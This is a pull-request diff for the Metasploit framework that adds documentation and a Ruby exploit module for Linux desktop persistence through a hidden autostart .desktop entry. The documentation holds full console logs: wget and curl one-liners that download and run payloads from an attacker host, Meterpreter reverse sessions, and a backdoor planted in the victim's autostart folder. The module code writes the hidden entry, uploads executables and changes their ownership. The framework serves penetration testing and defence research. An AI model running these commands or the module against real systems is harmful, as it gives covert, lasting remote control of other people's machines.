Merge pull request #20497 from h00die/modern_persistence_autostart

update autostart to persistence mixin

Author: dledda-r7

documentation/modules/exploit/linux/local/autostart_persistence.md

@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+This module will create an autostart `.desktop` entry to execute a payload.
+The payload will be executed when the users logs in.
+
+Verified on Ubuntu 22.04 desktop with Gnome, and 18.04.3.
+The following payloads were used in testing:
+- `cmd/unix/reverse_netcat`
+- `linux/x64/meterpreter/reverse_tcp`
+- `cmd/linux/http/x64/meterpreter/reverse_tcp`
+
+## Verification Steps
+
+1. Exploit a box
+2. `use exploit/linux/persistence/autostart`
+3. `set SESSION <id>`
+4. `exploit`
+
+When the victim logs in, your payload will be executed!
+
+## Options
+
+### BACKDOOR_NAME
+
+Name of autostart entry. Defaults to a randomly generated name
+
+### PAYLOAD_NAME
+
+Name of the payload file to write. Defaults to a randomly generated name
+
+### USER
+
+User to target, or current user if blank
+
+## Scenarios
+
+### Ubuntu 18.04.3
+
+Initial access vector via web delivery
+
+```
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
+lhost => 111.111.1.111
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set srvport 8181
+srvport => 8181
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4545
+lport => 4545
+resource (/root/.msf4/msfconsole.rc)> set URIPATH l
+URIPATH => l
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Starting persistent handler(s)...
+[*] Started reverse TCP handler on 111.111.1.111:4545 
+[*] Using URL: http://111.111.1.111:8181/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO FWdHRs3A --no-check-certificate http://111.111.1.111:8181/l; chmod +x FWdHRs3A; ./FWdHRs3A& disown
+[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > [*] 222.222.2.222    web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:57884) at 2025-02-06 17:03:03 -0500
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+(Meterpreter 1)(/tmp) > sysinfo
+Computer     : ubuntu18desktop.local
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+(Meterpreter 1)(/tmp) > background
+[*] Backgrounding session 1...
+```
+
+Persistence
+
+```
+[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/autostart 
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/autostart) > set session 1
+session => 1
+[msf](Jobs:1 Agents:1) exploit(linux/persistence/autostart) > exploit
+[*] Command to run on remote host: curl -so ./xcsqfBQnCfcm http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./xcsqfBQnCfcm;./xcsqfBQnCfcm&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/persistence/autostart) > 
+[*] Fetch handler listening on 111.111.1.111:8080
+[*] HTTP server started
+[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
+[*] Started reverse TCP handler on 111.111.1.111:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Xorg is installed, possible desktop install.
+[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
+[*] Making sure the autostart directory exists
+[*] Uploading autostart file /home/ubuntu/.config/autostart/bHOXeW.desktop
+[+] Backdoor will run on next login by ubuntu
+[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/ubuntu18desktop.local_20250206.0326/ubuntu18desktop.local_20250206.0326.rc
+[*] Client 222.222.2.222 requested /Hg3DGEu9GqlWD06kh4AzFg
+```
+
+Login via gui
+
+```
+[*] Sending payload to 222.222.2.222 (curl/7.58.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 222.222.2.222
+[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:44316) at 2025-02-06 17:03:50 -0500
+[msf](Jobs:2 Agents:2) exploit(linux/persistence/autostart) > 
+```

documentation/modules/exploit/linux/persistence/autostart.md

@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+  include Msf::Exploit::EXE # for generate_payload_exe
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Linux::User
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Deprecated
+  moved_from 'exploits/linux/local/autostart_persistence'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Autostart Desktop Item Persistence',
+        'Description' => %q{
+          This module will create an autostart .desktop entry to execute a payload.
+          The payload will be executed when the users logs in.
+          Verified on Ubuntu 22.04 desktop with Gnome, and 18.04.3.
+          The following payloads were used in testing:
+          - cmd/unix/reverse_netcat
+          - linux/x64/meterpreter/reverse_tcp
+          - cmd/linux/http/x64/meterpreter/reverse_tcp
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Eliott Teissonniere' ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => [
+          ARCH_CMD,
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+        'Payload' => {
+          'BadChars' => '#%\n"'
+        },
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'DisclosureDate' => '2006-02-13', # Date of the 0.5 doc for autostart
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1547_013_XDG_AUTOSTART_ENTRIES],
+          ['URL', 'https://specifications.freedesktop.org/autostart-spec/latest/'],
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('BACKDOOR_NAME', [false, 'Name of autostart entry' ]),
+      OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),
+      OptString.new('USER', [ false, 'User to target, or current user if blank', '' ]),
+    ])
+  end
+
+  def check
+    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')
+    # https://unix.stackexchange.com/a/237750
+    return CheckCode::Safe('Xorg is not installed, likely a server install. Autostart requires a graphical environment') unless command_exists?('Xorg')
+
+    CheckCode::Detected('Xorg is installed, possible desktop install.')
+  end
+
+  def target_user
+    return datastore['USER'] unless datastore['USER'].blank?
+
+    whoami
+  end
+
+  def install_persistence
+    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp') && payload.arch.first != 'cmd'
+    user = target_user
+    home = get_home_dir(user)
+    vprint_status('Making sure the autostart directory exists')
+    cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
+
+    name = datastore['BACKDOOR_NAME'] || Rex::Text.rand_text_alpha(5..8)
+    path = "#{home}/.config/autostart/#{name}.desktop"
+
+    print_status("Uploading autostart file #{path}")
+
+    autostart_stub = [
+      '[Desktop Entry]',
+      'Type=Application',
+      "Name=#{name}",
+      'NoDisplay=true',
+      'Terminal=false'
+    ]
+
+    if payload.arch.first == 'cmd'
+      write_file(path, (autostart_stub + ["Exec=/bin/sh -c \"#{payload.encoded}\""]).join("\n"))
+    else
+      payload_path = writable_dir
+      payload_path = payload_path.end_with?('/') ? payload_path : "#{payload_path}/"
+      payload_name = datastore['PAYLOAD_NAME'] || rand_text_alphanumeric(5..10)
+      payload_path << payload_name
+      print_status("Uploading payload file to #{payload_path}")
+      upload_and_chmodx payload_path, generate_payload_exe
+      write_file(path, (autostart_stub + ["Exec=\"#{payload_path}\""]).join("\n"))
+      @clean_up_rc << "rm #{payload_path}\n"
+    end
+
+    if whoami != user
+      cmd_exec("chown #{user}:#{user} #{path}")
+      unless payload.arch.first == 'cmd'
+        cmd_exec("chown #{user}:#{user} #{payload_path}")
+      end
+    end
+
+    print_good("Backdoor will run on next login by #{user}")
+
+    @clean_up_rc << "rm #{path}\n"
+  end
+end